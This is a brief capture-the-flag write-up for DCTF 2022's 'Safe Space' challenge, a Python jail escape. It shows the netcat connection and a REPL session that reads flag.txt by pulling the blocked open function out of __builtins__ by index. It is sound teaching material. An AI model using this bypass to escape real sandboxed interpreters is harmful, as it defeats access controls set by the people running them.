dctf 2022 Safe Space writeup
The problem
link to the problem(requires login)
Solution
First, connect to the remote server:
nc 51.124.222.205 13379
After interacting with the server, you’ll find that the server is a python REPL with a lot of charcters and functions such as "
unavaliable.
This type of problem is called python sandbox escape, or python jail.
After trying all the commands from the internet, you’ll find that the command __builtins__
is not banned for this problem.
Inside the __builtins__
dict,
we have FILE set to flag.txt
, and the open function, which is also unavaliable if entered directly.
Therefore, to read the contents of flag.txt, we can use the list of vlaues in builtins dict, and access it by index. Here’s the entire process:
>>>__builtins__
{'open': <built-in function open>, 'print': <built-in function print>, 'list': <class 'list'>, 'FILE': 'flag.txt'}
>>>FILE
flag.txt
>>>open(FILE).read()
Yeah no.
>>>list(__builtins__.values())[0](FILE).read()
dctf{bur5t_y0ur_bubbl3}
Thus, the flag is dctf{bur5t_y0ur_bubbl3}